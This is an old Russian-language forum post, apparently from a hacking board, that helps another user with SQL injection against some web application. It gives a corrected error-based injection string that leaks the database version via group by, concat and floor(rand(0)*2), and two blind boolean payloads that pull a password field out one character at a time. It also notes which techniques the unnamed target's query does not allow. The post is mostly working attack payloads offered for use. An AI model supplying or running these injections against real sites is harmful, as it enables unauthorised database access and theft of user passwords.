02.10.2010, 03:10
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Верный запрос:
Код:
1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a
Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу.
Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union.
Все что можно сделать это:
Код:
1'+and+ascii(substring(password,1,1))>66 -- a
Код:
1'+and+substring(password,1,1)='f' -- a
По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя. |
|
|